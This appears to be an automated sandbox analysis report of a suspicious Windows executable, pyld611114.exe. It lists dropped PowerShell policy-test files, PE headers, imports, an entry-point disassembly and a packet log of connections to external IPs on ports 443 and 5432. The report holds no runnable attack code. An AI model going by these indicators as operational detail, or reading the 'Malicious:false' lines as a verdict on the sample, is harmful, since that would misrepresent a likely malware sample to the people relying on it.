                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_bx43p0ow.g4y.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_cqma3hc2.skr.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_dwvfnmxn.e5l.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_h2xozzil.jn3.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_hwb3znkd.bmp.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_rhnj0nbb.3yb.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_vpqwsit2.lje.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Windows\Temp\__PSScriptPolicyTest_w23zxcil.tvm.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Entropy (8bit):6.5564607842905644
                                                                                          TrID:
                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:pyld611114.exe
                                                                                          File size:15'180'800 bytes
                                                                                          MD5:43bce45d873189f9ae2767d89a1c46e0
                                                                                          SHA1:34bc871a24e54a83740e0df51320b9836d8b820b
                                                                                          SHA256:9ae4784f0b139619ca8fdadfa31b53b1cbf7cd2b45f74b7e4004e5a97e842291
                                                                                          SHA512:f3424b65c72e242e77e5129903b4dc42fb94076402d24c9f2cea07ff117761942ecedec43e0ad6e39ef61628ed0c4709be7706e3c20537d476edb57df2521380
                                                                                          SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                                                                                          TLSH:9EE69E5AB7B900A9E477C278C5975217F772B811037097DB1BA4A6B91F33BD0AE3A700
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l...?...?...?.,.>`..?.,.>...?.,.>...?.).>...?.).>...?.).>...?.,.>...?...?V..?.(.>...?.(z?...?.(.>...?Rich...?........PE..d..

                                                                                          File Icon

                                                                                          Icon Hash:00928e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x1400235d0
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x140000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x66C34368 [Mon Aug 19 13:06:48 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:7f0e1170ffadddb37aa500dea54d9334

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          dec eax
                                                                                          sub esp, 28h
                                                                                          call 00007F25E881D8BCh
                                                                                          dec eax
                                                                                          add esp, 28h
                                                                                          jmp 00007F25E881CE1Fh
                                                                                          int3
                                                                                          int3
                                                                                          dec eax
                                                                                          sub esp, 28h
                                                                                          dec ebp
                                                                                          mov eax, dword ptr [ecx+38h]
                                                                                          dec eax
                                                                                          mov ecx, edx
                                                                                          dec ecx
                                                                                          mov edx, ecx
                                                                                          call 00007F25E881CFB2h
                                                                                          mov eax, 00000001h
                                                                                          dec eax
                                                                                          add esp, 28h
                                                                                          ret
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          inc eax
                                                                                          push ebx
                                                                                          inc ebp
                                                                                          mov ebx, dword ptr [eax]
                                                                                          dec eax
                                                                                          mov ebx, edx
                                                                                          inc ecx
                                                                                          and ebx, FFFFFFF8h
                                                                                          dec esp
                                                                                          mov ecx, ecx
                                                                                          inc ecx
                                                                                          test byte ptr [eax], 00000004h
                                                                                          dec esp
                                                                                          mov edx, ecx
                                                                                          je 00007F25E881CFB5h
                                                                                          inc ecx
                                                                                          mov eax, dword ptr [eax+08h]
                                                                                          dec ebp
                                                                                          arpl word ptr [eax+04h], dx
                                                                                          neg eax
                                                                                          dec esp
                                                                                          add edx, ecx
                                                                                          dec eax
                                                                                          arpl ax, cx
                                                                                          dec esp
                                                                                          and edx, ecx
                                                                                          dec ecx
                                                                                          arpl bx, ax
                                                                                          dec edx
                                                                                          mov edx, dword ptr [eax+edx]
                                                                                          dec eax
                                                                                          mov eax, dword ptr [ebx+10h]
                                                                                          mov ecx, dword ptr [eax+08h]
                                                                                          dec eax
                                                                                          mov eax, dword ptr [ebx+08h]
                                                                                          test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                          je 00007F25E881CFADh
                                                                                          movzx eax, byte ptr [ecx+eax+03h]
                                                                                          and eax, FFFFFFF0h
                                                                                          dec esp
                                                                                          add ecx, eax
                                                                                          dec esp
                                                                                          xor ecx, edx
                                                                                          dec ecx
                                                                                          mov ecx, ecx
                                                                                          pop ebx
                                                                                          jmp 00007F25E881CC26h
                                                                                          int3
                                                                                          dec eax
                                                                                          mov dword ptr [esp+10h], ebx
                                                                                          dec eax
                                                                                          mov dword ptr [esp+18h], esi
                                                                                          push ebp
                                                                                          push edi
                                                                                          inc ecx
                                                                                          push esi
                                                                                          dec eax
                                                                                          mov ebp, esp
                                                                                          dec eax
                                                                                          sub esp, 10h
                                                                                          xor eax, eax
                                                                                          xor ecx, ecx
                                                                                          cpuid
                                                                                          inc esp
                                                                                          mov eax, ecx
                                                                                          inc esp
                                                                                          mov edx, edx
                                                                                          inc ecx
                                                                                          xor edx, 49656E69h
                                                                                          inc ecx
                                                                                          xor eax, 6C65746Eh
                                                                                          inc esp
                                                                                          mov ecx, ebx
                                                                                          inc esp
                                                                                          mov esi, eax
                                                                                          xor ecx, ecx

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe743640x3c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe7d0000x1e8.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe780000x37ec.pdata
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe7e0000xa94.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xe6d0100x38.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xe6ced00x140.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3e0000x360.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x3cf940x3d000993d88a8d40ba69c46d0f609b5a111a8False0.5172459336577869data6.466922004661196IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x3e0000xe36eca0xe3700060af217ef049e0dd97bd2afa21116458unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xe750000x2f200x18006d5b50432fd5d87db0c8867cb401d65fFalse0.1845703125DOS executable (block device driver)3.239229168675621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .pdata0xe780000x37ec0x38000910ecade5a97bfb43d63b0dcf36c345False0.47816685267857145data5.663839152874396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .fptable0xe7c0000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0xe7d0000x1e80x200ef916bf7b1806924ac302571ad1074b3False0.546875data4.772037401703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xe7e0000xa940xc00aef26abe13eae7a5fc9990a8e46bfcfbFalse0.4690755208333333data5.140703611960964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_MANIFEST0xe7d0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllOpenProcess, CreateToolhelp32Snapshot, Process32NextW, GetSystemDirectoryW, CloseHandle, CreateProcessW, SetEndOfFile, WaitForSingleObject, GetModuleFileNameW, TerminateProcess, Process32FirstW, GetModuleHandleExW, MultiByteToWideChar, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, GetLastError, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, WideCharToMultiByte, Sleep, GetCurrentThreadId, CompareStringEx, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW, RtlUnwind
                                                                                          ADVAPI32.dllRegSetValueExW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 18, 2024 12:41:45.745776892 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:45.745816946 CET4434981434.117.59.81192.168.2.6
                                                                                          Dec 18, 2024 12:41:45.745943069 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:45.792438030 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:45.792467117 CET4434981434.117.59.81192.168.2.6
                                                                                          Dec 18, 2024 12:41:47.006822109 CET4434981434.117.59.81192.168.2.6
                                                                                          Dec 18, 2024 12:41:47.006901026 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:47.014620066 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:47.014661074 CET4434981434.117.59.81192.168.2.6
                                                                                          Dec 18, 2024 12:41:47.014822960 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:47.014926910 CET4434981434.117.59.81192.168.2.6
                                                                                          Dec 18, 2024 12:41:47.014987946 CET49814443192.168.2.634.117.59.81
                                                                                          Dec 18, 2024 12:41:57.856072903 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:41:57.975671053 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:41:57.975780964 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:41:57.976932049 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:41:58.096438885 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:41:59.249964952 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:41:59.266490936 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:41:59.386128902 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:41:59.661315918 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:41:59.662338018 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:41:59.781898022 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.059653997 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.059767008 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.059819937 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:00.061950922 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:00.062078953 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:00.181540966 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.181567907 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.456337929 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.456937075 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:00.631782055 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.871494055 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:00.878434896 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:00.998147964 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:01.275698900 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:01.276027918 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:01.395663023 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:01.670129061 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:01.670377970 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:01.790002108 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.066909075 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.067536116 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:02.187511921 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.469691992 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.524849892 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:02.577550888 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:02.697150946 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.971921921 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:02.972107887 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:03.091702938 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.366796017 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.366905928 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.366955996 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:03.367095947 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:03.486588001 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.761091948 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.806140900 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:03.906635046 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:03.906682014 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.906739950 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:03.907952070 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:03.907967091 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.550216913 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.550321102 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:05.552170992 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:05.552189112 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.552403927 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:05.552419901 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.552437067 CET4434986020.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.552486897 CET49860443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:05.552669048 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:05.672295094 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.957905054 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:05.958146095 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:06.077928066 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.352514029 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.352881908 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:06.472544909 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.766166925 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.768115044 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:06.768233061 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.768333912 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:06.768745899 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:06.768784046 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:06.821799040 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:08.347330093 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.347410917 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.348953962 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.348967075 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.349134922 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.349143982 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.349159002 CET4434987220.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.349356890 CET49872443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.349468946 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:08.349507093 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:08.349657059 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:08.352796078 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.352832079 CET4434988120.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.353043079 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.354721069 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:08.354729891 CET4434988120.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.469007015 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.469029903 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.469856024 CET543249844188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:42:08.469913006 CET498445432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:42:09.934743881 CET4434988120.233.83.145192.168.2.6
                                                                                          Dec 18, 2024 12:42:09.934914112 CET49881443192.168.2.620.233.83.145
                                                                                          Dec 18, 2024 12:42:09.936140060 CET49881443192.168.2.620.233.83.145
